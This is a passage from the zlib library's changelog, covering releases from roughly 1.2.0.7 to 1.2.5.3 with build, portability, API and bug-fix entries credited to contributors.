Fix large-entry detection in minizip on 64-bit systems [Schiffer] - Have ./configure use the compiler return code for error indication - Fix CMakeLists.txt for cross compilation [McClure] - Fix contrib/minizip/zip.c for 64-bit architectures [Dalsnes] - Fix compilation of contrib/minizip on FreeBSD [Marquez] - Correct suggested usages in win32/Makefile.msc [Shachar, Horvath] - Include io.h for Turbo C / Borland C on all platforms [Truta] - Make version explicit in contrib/minizip/configure.ac [Bosmans] - Avoid warning for no encryption in contrib/minizip/zip.c [Vollant] - Minor cleanup up contrib/minizip/unzip.c [Vollant] - Fix bug when compiling minizip with C++ [Vollant] - Protect for long name and extra fields in contrib/minizip [Vollant] - Avoid some warnings in contrib/minizip [Vollant] - Add -I../.. -L../.. to CFLAGS for minizip and miniunzip - Add missing libs to minizip linker command - Add support for VPATH builds in contrib/minizip - Add an --enable-demos option to contrib/minizip/configure - Add the generation of configure.log by ./configure - Exit when required parameters not provided to win32/Makefile.gcc - Have gzputc return the character written instead of the argument - Use the -m option on ldconfig for BSD systems [Tobias] - Correct in zlib.map when deflateResetKeep was added Changes in 1.2.5.3 (15 Jan 2012) - Restore gzgetc function for binary compatibility - Do not use _lseeki64 under Borland C++ [Truta] - Update win32/Makefile.msc to build test/*.c [Truta] - Remove old/visualc6 given CMakefile and other alternatives - Update AS400 build files and documentation [Monnerat] - Update win32/Makefile.gcc to build test/*.c [Truta] - Permit stronger flushes after Z_BLOCK flushes - Avoid extraneous empty blocks when doing empty flushes - Permit Z_NULL arguments to deflatePending - Allow deflatePrime() to insert bits in the middle of a stream - Remove second empty static block for Z_PARTIAL_FLUSH - Write out all of the available bits when using Z_BLOCK - Insert the first two strings in the hash table after a flush Changes in 1.2.5.2 (17 Dec 2011) - fix ld error: unable to find version dependency 'ZLIB_1.2.5' - use relative symlinks for shared libs - Avoid searching past window for Z_RLE strategy - Assure that high-water mark initialization is always applied in deflate - Add assertions to fill_window() in deflate.c to match comments - Update python link in README - Correct spelling error in gzread.c - Fix bug in gzgets() for a concatenated empty gzip stream - Correct error in comment for gz_make() - Change gzread() and related to ignore junk after gzip streams - Allow gzread() and related to continue after gzclearerr() - Allow gzrewind() and gzseek() after a premature end-of-file - Simplify gzseek() now that raw after gzip is ignored - Change gzgetc() to a macro for speed (~40% speedup in testing) - Fix gzclose() to return the actual error last encountered - Always add large file support for windows - Include zconf.h for windows large file support - Include zconf.h.cmakein for windows large file support - Update zconf.h.cmakein on make distclean - Merge vestigial vsnprintf determination from zutil.h to gzguts.h - Clarify how gzopen() appends in zlib.h comments - Correct documentation of gzdirect() since junk at end now ignored - Add a transparent write mode to gzopen() when 'T' is in the mode - Update python link in zlib man page - Get inffixed.h and MAKEFIXED result to match - Add a ./config --solo option to make zlib subset with no library use - Add undocumented inflateResetKeep() function for CAB file decoding - Add --cover option to ./configure for gcc coverage testing - Add #define ZLIB_CONST option to use const in the z_stream interface - Add comment to gzdopen() in zlib.h to use dup() when using fileno() - Note behavior of uncompress() to provide as much data as it can - Add files in contrib/minizip to aid in building libminizip - Split off AR options in Makefile.in and configure - Change ON macro to Z_ARG to avoid application conflicts - Facilitate compilation with Borland C++ for pragmas and vsnprintf - Include io.h for Turbo C / Borland C++ - Move example.c and minigzip.c to test/ - Simplify incomplete code table filling in inflate_table() - Remove code from inflate.c and infback.c that is impossible to execute - Test the inflate code with full coverage - Allow deflateSetDictionary, inflateSetDictionary at any time (in raw) - Add deflateResetKeep and fix inflateResetKeep to retain dictionary - Fix gzwrite.c to accommodate reduced memory zlib compilation - Have inflate() with Z_FINISH avoid the allocation of a window - Do not set strm->adler when doing raw inflate - Fix gzeof() to behave just like feof() when read is not past end of file - Fix bug in gzread.c when end-of-file is reached - Avoid use of Z_BUF_ERROR in gz* functions except for premature EOF - Document gzread() capability to read concurrently written files - Remove hard-coding of resource compiler in CMakeLists.txt [Blammo] Changes in 1.2.5.1 (10 Sep 2011) - Update FAQ entry on shared builds (#13) - Avoid symbolic argument to chmod in Makefile.in - Fix bug and add consts in contrib/puff [Oberhumer] - Update contrib/puff/zeros.raw test file to have all block types - Add full coverage test for puff in contrib/puff/Makefile - Fix static-only-build install in Makefile.in - Fix bug in unzGetCurrentFileInfo() in contrib/minizip [Kuno] - Add libz.a dependency to shared in Makefile.in for parallel builds - Spell out "number" (instead of "nb") in zlib.h for total_in, total_out - Replace $(...) with `...` in configure for non-bash sh [Bowler] - Add darwin* to Darwin* and solaris* to SunOS\ 5* in configure [Groffen] - Add solaris* to Linux* in configure to allow gcc use [Groffen] - Add *bsd* to Linux* case in configure [Bar-Lev] - Add inffast.obj to dependencies in win32/Makefile.msc - Correct spelling error in deflate.h [Kohler] - Change libzdll.a again to libz.dll.a (!) in win32/Makefile.gcc - Add test to configure for GNU C looking for gcc in output of $cc -v - Add zlib.pc generation to win32/Makefile.gcc [Weigelt] - Fix bug in zlib.h for _FILE_OFFSET_BITS set and _LARGEFILE64_SOURCE not - Add comment in zlib.h that adler32_combine with len2 < 0 makes no sense - Make NO_DIVIDE option in adler32.c much faster (thanks to John Reiser) - Make stronger test in zconf.h to include unistd.h for LFS - Apply Darwin patches for 64-bit file offsets to contrib/minizip [Slack] - Fix zlib.h LFS support when Z_PREFIX used - Add updated as400 support (removed from old) [Monnerat] - Avoid deflate sensitivity to volatile input data - Avoid division in adler32_combine for NO_DIVIDE - Clarify the use of Z_FINISH with deflateBound() amount of space - Set binary for output file in puff.c - Use u4 type for crc_table to avoid conversion warnings - Apply casts in zlib.h to avoid conversion warnings - Add OF to prototypes for adler32_combine_ and crc32_combine_ [Miller] - Improve inflateSync() documentation to note indeterminacy - Add deflatePending() function to return the amount of pending output - Correct the spelling of "specification" in FAQ [Randers-Pehrson] - Add a check in configure for stdarg.h, use for gzprintf() - Check that pointers fit in ints when gzprint() compiled old style - Add dummy name before $(SHAREDLIBV) in Makefile [Bar-Lev, Bowler] - Delete line in configure that adds -L. libz.a to LDFLAGS [Weigelt] - Add debug records in assembler code [Londer] - Update RFC references to use http://tools.ietf.org/html/... [Li] - Add --archs option, use of libtool to configure for Mac OS X [Borstel] Changes in 1.2.5 (19 Apr 2010) - Disable visibility attribute in win32/Makefile.gcc [Bar-Lev] - Default to libdir as sharedlibdir in configure [Nieder] - Update copyright dates on modified source files - Update trees.c to be able to generate modified trees.h - Exit configure for MinGW, suggesting win32/Makefile.gcc - Check for NULL path in gz_open [Homurlu] Changes in 1.2.4.5 (18 Apr 2010) - Set sharedlibdir in configure [Torok] - Set LDFLAGS in Makefile.in [Bar-Lev] - Avoid mkdir objs race condition in Makefile.in [Bowler] - Add ZLIB_INTERNAL in front of internal inter-module functions and arrays - Define ZLIB_INTERNAL to hide internal functions and arrays for GNU C - Don't use hidden attribute when it is a warning generator (e.g. Solaris) Changes in 1.2.4.4 (18 Apr 2010) - Fix CROSS_PREFIX executable testing, CHOST extract, mingw* [Torok] - Undefine _LARGEFILE64_SOURCE in zconf.h if it is zero, but not if empty - Try to use bash or ksh regardless of functionality of /bin/sh - Fix configure incompatibility with NetBSD sh - Remove attempt to run under bash or ksh since have better NetBSD fix - Fix win32/Makefile.gcc for MinGW [Bar-Lev] - Add diagnostic messages when using CROSS_PREFIX in configure - Added --sharedlibdir option to configure [Weigelt] - Use hidden visibility attribute when available [Frysinger] Changes in 1.2.4.3 (10 Apr 2010) - Only use CROSS_PREFIX in configure for ar and ranlib if they exist - Use CROSS_PREFIX for nm [Bar-Lev] - Assume _LARGEFILE64_SOURCE defined is equivalent to true - Avoid use of undefined symbols in #if with && and || - Make *64 prototypes in gzguts.h consistent with functions - Add -shared load option for MinGW in configure [Bowler] - Move z_off64_t to public interface, use instead of off64_t - Remove ! from shell test in configure (not portable to Solaris) - Change +0 macro tests to -0 for possibly increased portability Changes in 1.2.4.2 (9 Apr 2010) - Add consistent carriage returns to readme.txt's in masmx86 and masmx64 - Really provide prototypes for *64 functions when building without LFS - Only define unlink() in minigzip.c if unistd.h not included - Update README to point to contrib/vstudio project files - Move projects/vc6 to old/ and remove projects/ - Include stdlib.h in minigzip.c for setmode() definition under WinCE - Clean up assembler builds in win32/Makefile.msc [Rowe] - Include sys/types.h for Microsoft for off_t definition - Fix memory leak on error in gz_open() - Symbolize nm as $NM in configure [Weigelt] - Use TEST_LDSHARED instead of LDSHARED to link test programs [Weigelt] - Add +0 to _FILE_OFFSET_BITS and _LFS64_LARGEFILE in case not defined - Fix bug in gzeof() to take into account unused input data - Avoid initialization of structures with variables in puff.c - Updated win32/README-WIN32.txt [Rowe] Changes in 1.2.4.1 (28 Mar 2010) - Remove the use of [a-z] constructs for sed in configure [gentoo 310225] - Remove $(SHAREDLIB) from LIBS in Makefile.in [Creech] - Restore "for debugging" comment on sprintf() in gzlib.c - Remove fdopen for MVS from gzguts.h - Put new README-WIN32.txt in win32 [Rowe] - Add check for shell to configure and invoke another shell if needed - Fix big fat stinking bug in gzseek() on uncompressed files - Remove vestigial F_OPEN64 define in zutil.h - Set and check the value of _LARGEFILE_SOURCE and _LARGEFILE64_SOURCE - Avoid errors on non-LFS systems when applications define LFS macros - Set EXE to ".exe" in configure for MINGW [Kahle] - Match crc32() in crc32.c exactly to the prototype in zlib.h [Sherrill] - Add prefix for cross-compilation in win32/makefile.gcc [Bar-Lev] - Add DLL install in win32/makefile.gcc [Bar-Lev] - Allow Linux* or linux* from uname in configure [Bar-Lev] - Allow ldconfig to be redefined in configure and Makefile.in [Bar-Lev] - Add cross-compilation prefixes to configure [Bar-Lev] - Match type exactly in gz_load() invocation in gzread.c - Match type exactly of zcalloc() in zutil.c to zlib.h alloc_func - Provide prototypes for *64 functions when building zlib without LFS - Don't use -lc when linking shared library on MinGW - Remove errno.h check in configure and vestigial errno code in zutil.h Changes in 1.2.4 (14 Mar 2010) - Fix VER3 extraction in configure for no fourth subversion - Update zlib.3, add docs to Makefile.in to make .pdf out of it - Add zlib.3.pdf to distribution - Don't set error code in gzerror() if passed pointer is NULL - Apply destination directory fixes to CMakeLists.txt [Lowman] - Move #cmakedefine's to a new zconf.in.cmakein - Restore zconf.h for builds that don't use configure or cmake - Add distclean to dummy Makefile for convenience - Update and improve INDEX, README, and FAQ - Update CMakeLists.txt for the return of zconf.h [Lowman] - Update contrib/vstudio/vc9 and vc10 [Vollant] - Change libz.dll.a back to libzdll.a in win32/Makefile.gcc - Apply license and readme changes to contrib/asm686 [Raiter] - Check file name lengths and add -c option in minigzip.c [Li] - Update contrib/amd64 and contrib/masmx86/ [Vollant] - Avoid use of "eof" parameter in trees.c to not shadow library variable - Update make_vms.com for removal of zlibdefs.h [Zinser] - Update assembler code and vstudio projects in contrib [Vollant] - Remove outdated assembler code contrib/masm686 and contrib/asm586 - Remove old vc7 and vc8 from contrib/vstudio - Update win32/Makefile.msc, add ZLIB_VER_SUBREVISION [Rowe] - Fix memory leaks in gzclose_r() and gzclose_w(), file leak in gz_open() - Add contrib/gcc_gvmat64 for longest_match and inflate_fast [Vollant] - Remove *64 functions from win32/zlib.def (they're not 64-bit yet) - Fix bug in void-returning vsprintf() case in gzwrite.c - Fix name change from inflate.h in contrib/inflate86/inffas86.c - Check if temporary file exists before removing in make_vms.com [Zinser] - Fix make install and uninstall for --static option - Fix usage of _MSC_VER in gzguts.h and zutil.h [Truta] - Update readme.txt in contrib/masmx64 and masmx86 to assemble Changes in 1.2.3.9 (21 Feb 2010) - Expunge gzio.c - Move as400 build information to old - Fix updates in contrib/minizip and contrib/vstudio - Add const to vsnprintf test in configure to avoid warnings [Weigelt] - Delete zconf.h (made by configure) [Weigelt] - Change zconf.in.h to zconf.h.in per convention [Weigelt] - Check for NULL buf in gzgets() - Return empty string for gzgets() with len == 1 (like fgets()) - Fix description of gzgets() in zlib.h for end-of-file, NULL return - Update minizip to 1.1 [Vollant] - Avoid MSVC loss of data warnings in gzread.c, gzwrite.c - Note in zlib.h that gzerror() should be used to distinguish from EOF - Remove use of snprintf() from gzlib.c - Fix bug in gzseek() - Update contrib/vstudio, adding vc9 and vc10 [Kuno, Vollant] - Fix zconf.h generation in CMakeLists.txt [Lowman] - Improve comments in zconf.h where modified by configure Changes in 1.2.3.8 (13 Feb 2010) - Clean up text files (tabs, trailing whitespace, etc.) [Oberhumer] - Use z_off64_t in gz_zero() and gz_skip() to match state->skip - Avoid comparison problem when sizeof(int) == sizeof(z_off64_t) - Revert to Makefile.in from 1.2.3.6 (live with the clutter) - Fix missing error return in gzflush(), add zlib.h note - Add *64 functions to zlib.map [Levin] - Fix signed/unsigned comparison in gz_comp() - Use SFLAGS when testing shared linking in configure - Add --64 option to ./configure to use -m64 with gcc - Fix ./configure --help to correctly name options - Have make fail if a test fails [Levin] - Avoid buffer overrun in contrib/masmx64/gvmat64.asm [Simpson] - Remove assembler object files from contrib Changes in 1.2.3.7 (24 Jan 2010) - Always gzopen() with O_LARGEFILE if available - Fix gzdirect() to work immediately after gzopen() or gzdopen() - Make gzdirect() more precise when the state changes while reading - Improve zlib.h documentation in many places - Catch memory allocation failure in gz_open() - Complete close operation if seek forward in gzclose_w() fails - Return Z_ERRNO from gzclose_r() if close() fails - Return Z_STREAM_ERROR instead of EOF for gzclose() being passed NULL - Return zero for gzwrite() errors to match zlib.h description - Return -1 on gzputs() error to match zlib.h description - Add zconf.in.h to allow recovery from configure modification [Weigelt] - Fix static library permissions in Makefile.in [Weigelt] - Avoid warnings in configure tests that hide functionality [Weigelt] - Add *BSD and DragonFly to Linux case in configure [gentoo 123571] - Change libzdll.a to libz.dll.a in win32/Makefile.gcc [gentoo 288212] - Avoid access of uninitialized data for first inflateReset2 call [Gomes] - Keep object files in subdirectories to reduce the clutter somewhat - Remove default Makefile and zlibdefs.h, add dummy Makefile - Add new external functions to Z_PREFIX, remove duplicates, z_z_ -> z_ - Remove zlibdefs.h completely -- modify zconf.h instead Changes in 1.2.3.6 (17 Jan 2010) - Avoid void * arithmetic in gzread.c and gzwrite.c - Make compilers happier with const char * for gz_error message - Avoid unused parameter warning in inflate.c - Avoid signed-unsigned comparison warning in inflate.c - Indent #pragma's for traditional C - Fix usage of strwinerror() in glib.c, change to gz_strwinerror() - Correct email address in configure for system options - Update make_vms.com and add make_vms.com to contrib/minizip [Zinser] - Update zlib.map [Brown] - Fix Makefile.in for Solaris 10 make of example64 and minizip64 [Torok] - Apply various fixes to CMakeLists.txt [Lowman] - Add checks on len in gzread() and gzwrite() - Add error message for no more room for gzungetc() - Remove zlib version check in gzwrite() - Defer compression of gzprintf() result until need to - Use snprintf() in gzdopen() if available - Remove USE_MMAP configuration determination (only used by minigzip) - Remove examples/pigz.c (available separately) - Update examples/gun.c to 1.6 Changes in 1.2.3.5 (8 Jan 2010) - Add space after #if in zutil.h for some compilers - Fix relatively harmless bug in deflate_fast() [Exarevsky] - Fix same problem in deflate_slow() - Add $(SHAREDLIBV) to LIBS in Makefile.in [Brown] - Add deflate_rle() for faster Z_RLE strategy run-length encoding - Add deflate_huff() for faster Z_HUFFMAN_ONLY encoding - Change name of "write" variable in inffast.c to avoid library collisions - Fix premature EOF from gzread() in gzio.c [Brown] - Use zlib header window size if windowBits is 0 in inflateInit2() - Remove compressBound() call in deflate.c to avoid linking compress.o - Replace use of errno in gz* with functions, support WinCE [Alves] - Provide alternative to perror() in minigzip.c for WinCE [Alves] - Don't use _vsnprintf on later versions of MSVC [Lowman] - Add CMake build script and input file [Lowman] - Update contrib/minizip to 1.1 [Svensson, Vollant] - Moved nintendods directory from contrib to root - Replace gzio.c with a new set of routines with the same functionality - Add gzbuffer(), gzoffset(), gzclose_r(), gzclose_w() as part of above - Update contrib/minizip to 1.1b - Change gzeof() to return 0 on error instead of -1 to agree with zlib.h Changes in 1.2.3.4 (21 Dec 2009) - Use old school .SUFFIXES in Makefile.in for FreeBSD compatibility - Update comments in configure and Makefile.in for default --shared - Fix test -z's in configure [Marquess] - Build examplesh and minigzipsh when not testing - Change NULL's to Z_NULL's in deflate.c and in comments in zlib.h - Import LDFLAGS from the environment in configure - Fix configure to populate SFLAGS with discovered CFLAGS options - Adapt make_vms.com to the new Makefile.in [Zinser] - Add zlib2ansi script for C++ compilation [Marquess] - Add _FILE_OFFSET_BITS=64 test to make test (when applicable) - Add AMD64 assembler code for longest match to contrib [Teterin] - Include options from $SFLAGS when doing $LDSHARED - Simplify 64-bit file support by introducing z_off64_t type - Make shared object files in objs directory to work around old Sun cc - Use only three-part version number for Darwin shared compiles - Add rc option to ar in Makefile.in for when ./configure not run - Add -WI,-rpath,. to LDFLAGS for OSF 1 V4* - Set LD_LIBRARYN32_PATH for SGI IRIX shared compile - Protect against _FILE_OFFSET_BITS being defined when compiling zlib - Rename Makefile.in targets allstatic to static and allshared to shared - Fix static and shared Makefile.in targets to be independent - Correct error return bug in gz_open() by setting state [Brown] - Put spaces before ;;'s in configure for better sh compatibility - Add pigz.c (parallel implementation of gzip) to examples/ - Correct constant in crc32.c to UL [Leventhal] - Reject negative lengths in crc32_combine() - Add inflateReset2() function to work like inflateEnd()/inflateInit2() - Include sys/types.h for _LARGEFILE64_SOURCE [Brown] - Correct typo in doc/algorithm.txt [Janik] - Fix bug in adler32_combine() [Zhu] - Catch missing-end-of-block-code error in all inflates and in puff Assures that random input to inflate eventually results in an error - Added enough.c (calculation of ENOUGH for inftrees.h) to examples/ - Update ENOUGH and its usage to reflect discovered bounds - Fix gzerror() error report on empty input file [Brown] - Add ush casts in trees.c to avoid pedantic runtime errors - Fix typo in zlib.h uncompress() description [Reiss] - Correct inflate() comments with regard to automatic header detection - Remove deprecation comment on Z_PARTIAL_FLUSH (it stays) - Put new version of gzlog (2.0) in examples with interruption recovery - Add puff compile option to permit invalid distance-too-far streams - Add puff TEST command options, ability to read piped input - Prototype the *64 functions in zlib.h when _FILE_OFFSET_BITS == 64, but _LARGEFILE64_SOURCE not defined - Fix Z_FULL_FLUSH to truly erase the past by resetting s->strstart - Fix deflateSetDictionary() to use all 32K for output consistency - Remove extraneous #define MIN_LOOKAHEAD in deflate.c (in deflate.h) - Clear bytes after deflate lookahead to avoid use of uninitialized data - Change a limit in inftrees.c to be more transparent to Coverity Prevent - Update win32/zlib.def with exported symbols from zlib.h - Correct spelling errors in zlib.h [Willem, Sobrado] - Allow Z_BLOCK for deflate() to force a new block - Allow negative bits in inflatePrime() to delete existing bit buffer - Add Z_TREES flush option to inflate() to return at end of trees - Add inflateMark() to return current state information for random access - Add Makefile for NintendoDS to contrib [Costa] - Add -w in configure compile tests to avoid spurious warnings [Beucler] - Fix typos in zlib.h comments for deflateSetDictionary() - Fix EOF detection in transparent gzread() [Maier] Changes in 1.2.3.3 (2 October 2006) - Make --shared the default for configure, add a --static option - Add compile option to permit invalid distance-too-far streams - Add inflateUndermine() function which is required to enable above - Remove use of "this" variable name for C++ compatibility [Marquess] - Add testing of shared library in make test, if shared library built - Use ftello() and fseeko() if available instead of ftell() and fseek() - Provide two versions of all functions that use the z_off_t type for binary compatibility -- a normal version and a 64-bit offset version, per the Large File Support Extension when _LARGEFILE64_SOURCE is defined; use the 64-bit versions by default when _FILE_OFFSET_BITS is defined to be 64 - Add a --uname= option to configure to perhaps help with cross-compiling Changes in 1.2.3.2 (3 September 2006) - Turn off silly Borland warnings [Hay] - Use off64_t and define _LARGEFILE64_SOURCE when present - Fix missing dependency on inffixed.h in Makefile.in - Rig configure --shared to build both shared and static [Teredesai, Truta] - Remove zconf.in.h and instead create a new zlibdefs.h file - Fix contrib/minizip/unzip.c non-encrypted after encrypted [Vollant] - Add treebuild.xml (see http://treebuild.metux.de/) [Weigelt] Changes in 1.2.3.1 (16 August 2006) - Add watcom directory with OpenWatcom make files [Daniel] - Remove #undef of FAR in zconf.in.h for MVS [Fedtke] - Update make_vms.com [Zinser] - Use -fPIC for shared build in configure [Teredesai, Nicholson] - Use only major version number for libz.so on IRIX and OSF1 [Reinholdtsen] - Use fdopen() (not _fdopen()) for Interix in zutil.h [Bäck] - Add some FAQ entries about the contrib directory - Update the MVS question in the FAQ - Avoid extraneous reads after EOF in gzio.c [Brown] - Correct spelling of "successfully" in gzio.c [Randers-Pehrson] - Add comments to zlib.h about gzerror() usage [Brown] - Set extra flags in gzip header in gzopen() like deflate() does - Make configure options more compatible with double-dash conventions [Weigelt] - Clean up compilation under Solaris SunStudio cc [Rowe, Reinholdtsen] - Fix uninstall target in Makefile.in [Truta] - Add pkgconfig support [Weigelt] - Use $(DESTDIR) macro in Makefile.in [Reinholdtsen, Weigelt] - Replace set_data_type() with a more accurate detect_data_type() in trees.c, according to the txtvsbin.txt document [Truta] - Swap the order of #include and #include "zlib.h" in gzio.c, example.c and minigzip.c [Truta] - Shut up annoying VS2005 warnings about standard C deprecation [Rowe, Truta] (where?) - Fix target "clean" from win32/Makefile.bor [Truta] - Create .pdb and .manifest files in win32/makefile.msc [Ziegler, Rowe] - Update zlib www home address in win32/DLL_FAQ.txt [Truta] - Update contrib/masmx86/inffas32.asm for VS2005 [Vollant, Van Wassenhove] - Enable browse info in the "Debug" and "ASM Debug" configurations in the Visual C++ 6 project, and set (non-ASM) "Debug" as default [Truta] - Add pkgconfig support [Weigelt] - Add ZLIB_VER_MAJOR, ZLIB_VER_MINOR and ZLIB_VER_REVISION in zlib.h, for use in win32/zlib1.rc [Polushin, Rowe, Truta] - Add a document that explains the new text detection scheme to doc/txtvsbin.txt [Truta] - Add rfc1950.txt, rfc1951.txt and rfc1952.txt to doc/ [Truta] - Move algorithm.txt into doc/ [Truta] - Synchronize FAQ with website - Fix compressBound(), was low for some pathological cases [Fearnley] - Take into account wrapper variations in deflateBound() - Set examples/zpipe.c input and output to binary mode for Windows - Update examples/zlib_how.html with new zpipe.c (also web site) - Fix some warnings in examples/gzlog.c and examples/zran.c (it seems that gcc became pickier in 4.0) - Add zlib.map for Linux: "All symbols from zlib-1.1.4 remain un-versioned, the patch adds versioning only for symbols introduced in zlib-1.2.0 or later. It also declares as local those symbols which are not designed to be exported." [Levin] - Update Z_PREFIX list in zconf.in.h, add --zprefix option to configure - Do not initialize global static by default in trees.c, add a response NO_INIT_GLOBAL_POINTERS to initialize them if needed [Marquess] - Don't use strerror() in gzio.c under WinCE [Yakimov] - Don't use errno.h in zutil.h under WinCE [Yakimov] - Move arguments for AR to its usage to allow replacing ar [Marot] - Add HAVE_VISIBILITY_PRAGMA in zconf.in.h for Mozilla [Randers-Pehrson] - Improve inflateInit() and inflateInit2() documentation - Fix structure size comment in inflate.h - Change configure help option from --h* to --help [Santos] Changes in 1.2.3 (18 July 2005) - Apply security vulnerability fixes to contrib/infback9 as well - Clean up some text files (carriage returns, trailing space) - Update testzlib, vstudio, masmx64, and masmx86 in contrib [Vollant] Changes in 1.2.2.4 (11 July 2005) - Add inflatePrime() function for starting inflation at bit boundary - Avoid some Visual C warnings in deflate.c - Avoid more silly Visual C warnings in inflate.c and inftrees.c for 64-bit compile - Fix some spelling errors in comments [Betts] - Correct inflateInit2() error return documentation in zlib.h - Add zran.c example of compressed data random access to examples directory, shows use of inflatePrime() - Fix cast for assignments to strm->state in inflate.c and infback.c - Fix zlibCompileFlags() in zutil.c to use 1L for long shifts [Oberhumer] - Move declarations of gf2 functions to right place in crc32.c [Oberhumer] - Add cast in trees.c t avoid a warning [Oberhumer] - Avoid some warnings in fitblk.c, gun.c, gzjoin.c in examples [Oberhumer] - Update make_vms.com [Zinser] - Initialize state->write in inflateReset() since copied in inflate_fast() - Be more strict on incomplete code sets in inflate_table() and increase ENOUGH and MAXD -- this repairs a possible security vulnerability for invalid inflate input. Thanks to Tavis Ormandy and Markus Oberhumer for discovering the vulnerability and providing test cases - Add ia64 support to configure for HP-UX [Smith] - Add error return to gzread() for format or i/o error [Levin] - Use malloc.h for OS/2 [Necasek] Changes in 1.2.2.3 (27 May 2005) - Replace 1U constants in inflate.c and inftrees.c for 64-bit compile - Typecast fread() return values in gzio.c [Vollant] - Remove trailing space in minigzip.c outmode (VC++ can't deal with it) - Fix crc check bug in gzread() after gzungetc() [Heiner] - Add the deflateTune() function to adjust internal compression parameters - Add a fast gzip decompressor, gun.c, to examples (use of inflateBack) - Remove an incorrect assertion in examples/zpipe.c - Add C++ wrapper in infback9.h [Donais] - Fix bug in inflateCopy() when decoding fixed codes - Note in zlib.h how much deflateSetDictionary() actually uses - Remove USE_DICT_HEAD in deflate.c (would mess up inflate if used) - Add _WIN32_WCE to define WIN32 in zconf.in.h [Spencer] - Don't include stderr.h or errno.h for _WIN32_WCE in zutil.h [Spencer] - Add gzdirect() function to indicate transparent reads - Update contrib/minizip [Vollant] - Fix compilation of deflate.c when both ASMV and FASTEST [Oberhumer] - Add casts in crc32.c to avoid warnings [Oberhumer] - Add contrib/masmx64 [Vollant] - Update contrib/asm586, asm686, masmx86, testzlib, vstudio [Vollant] Changes in 1.2.2.2 (30 December 2004) - Replace structure assignments in deflate.c and inflate.c with zmemcpy to avoid implicit memcpy calls (portability for no-library compilation) - Increase sprintf() buffer size in gzdopen() to allow for large numbers - Add INFLATE_STRICT to check distances against zlib header - Improve WinCE errno handling and comments [Chang] - Remove comment about no gzip header processing in FAQ - Add Z_FIXED strategy option to deflateInit2() to force fixed trees - Add updated make_vms.com [Coghlan], update README - Create a new "examples" directory, move gzappend.c there, add zpipe.c, fitblk.c, gzlog.[ch], gzjoin.c, and zlib_how.html - Add FAQ entry and comments in deflate.c on uninitialized memory access - Add Solaris 9 make options in configure [Gilbert] - Allow strerror() usage in gzio.c for STDC - Fix DecompressBuf in contrib/delphi/ZLib.pas [ManChesTer] - Update contrib/masmx86/inffas32.asm and gvmat32.asm [Vollant] - Use z_off_t for adler32_combine() and crc32_combine() lengths - Make adler32() much faster for small len - Use OS_CODE in deflate() default gzip header Changes in 1.2.2.1 (31 October 2004) - Allow inflateSetDictionary() call for raw inflate - Fix inflate header crc check bug for file names and comments - Add deflateSetHeader() and gz_header structure for custom gzip headers - Add inflateGetheader() to retrieve gzip headers - Add crc32_combine() and adler32_combine() functions - Add alloc_func, free_func, in_func, out_func to Z_PREFIX list - Use zstreamp consistently in zlib.h (inflate_back functions) - Remove GUNZIP condition from definition of inflate_mode in inflate.h and in contrib/inflate86/inffast.S [Truta, Anderson] - Add support for AMD64 in contrib/inflate86/inffas86.c [Anderson] - Update projects/README.projects and projects/visualc6 [Truta] - Update win32/DLL_FAQ.txt [Truta] - Avoid warning under NO_GZCOMPRESS in gzio.c; fix typo [Truta] - Deprecate Z_ASCII; use Z_TEXT instead [Truta] - Use a new algorithm for setting strm->data_type in trees.c [Truta] - Do not define an exit() prototype in zutil.c unless DEBUG defined - Remove prototype of exit() from zutil.c, example.c, minigzip.c [Truta] - Add comment in zlib.h for Z_NO_FLUSH parameter to deflate() - Fix Darwin build version identification [Peterson] Changes in 1.2.2 (3 October 2004) - Update zlib.h comments on gzip in-memory processing - Set adler to 1 in inflateReset() to support Java test suite [Walles] - Add contrib/dotzlib [Ravn] - Update win32/DLL_FAQ.txt [Truta] - Update contrib/minizip [Vollant] - Move contrib/visual-basic.txt to old/ [Truta] - Fix assembler builds in projects/visualc6/ [Truta] Changes in 1.2.1.2 (9 September 2004) - Update INDEX file - Fix trees.c to update strm->data_type (no one ever noticed!) - Fix bug in error case in inflate.c, infback.c, and infback9.c [Brown] - Add "volatile" to crc table flag declaration (for DYNAMIC_CRC_TABLE) - Add limited multitasking protection to DYNAMIC_CRC_TABLE - Add NO_vsnprintf for VMS in zutil.h [Mozilla] - Don't declare strerror() under VMS [Mozilla] - Add comment to DYNAMIC_CRC_TABLE to use get_crc_table() to initialize - Update contrib/ada [Anisimkov] - Update contrib/minizip [Vollant] - Fix configure to not hardcode directories for Darwin [Peterson] - Fix gzio.c to not return error on empty files [Brown] - Fix indentation; update version in contrib/delphi/ZLib.pas and contrib/pascal/zlibpas.pas [Truta] - Update mkasm.bat in contrib/masmx86 [Truta] - Update contrib/untgz [Truta] - Add projects/README.projects [Truta] - Add project for MS Visual C++ 6.0 in projects/visualc6 [Cadieux, Truta] - Update win32/DLL_FAQ.txt [Truta] - Update list of Z_PREFIX symbols in zconf.h [Randers-Pehrson, Truta] - Remove an unnecessary assignment to curr in inftrees.c [Truta] - Add OS/2 to exe builds in configure [Poltorak] - Remove err dummy parameter in zlib.h [Kientzle] Changes in 1.2.1.1 (9 January 2004) - Update email address in README - Several FAQ updates - Fix a big fat bug in inftrees.c that prevented decoding valid dynamic blocks with only literals and no distance codes -- Thanks to "Hot Emu" for the bug report and sample file - Add a note to puff.c on no distance codes case Changes in 1.2.1 (17 November 2003) - Remove a tab in contrib/gzappend/gzappend.c - Update some interfaces in contrib for new zlib functions - Update zlib version number in some contrib entries - Add Windows CE definition for ptrdiff_t in zutil.h [Mai, Truta] - Support shared libraries on Hurd and KFreeBSD [Brown] - Fix error in NO_DIVIDE option of adler32.c Changes in 1.2.0.8 (4 November 2003) - Update version in contrib/delphi/ZLib.pas and contrib/pascal/zlibpas.pas - Add experimental NO_DIVIDE #define in adler32.c - Possibly faster on some processors (let me know if it is) - Correct Z_BLOCK to not return on first inflate call if no wrap - Fix strm->data_type on inflate() return to correctly indicate EOB - Add deflatePrime() function for appending in the middle of a byte - Add contrib/gzappend for an example of appending to a stream - Update win32/DLL_FAQ.txt [Truta] - Delete Turbo C comment in README [Truta] - Improve some indentation in zconf.h [Truta] - Fix infinite loop on bad input in configure script [Church] - Fix gzeof() for concatenated gzip files [Johnson] - Add example to contrib/visual-basic.txt [Michael B.] - Add -p to mkdir's in Makefile.in [vda] - Fix configure to properly detect presence or lack of printf functions - Add AS400 support [Monnerat] - Add a little Cygwin support [Wilson] Changes in 1.2.0.7 (21 September 2003) - Correct some debug formats in contrib/infback9 - Cast a type in a debug statement in trees.c - Change search and replace delimiter in configure from % to # [Beebe] - Update contrib/untgz to 0.2 with various fixes [Truta] - Add build support for Amiga 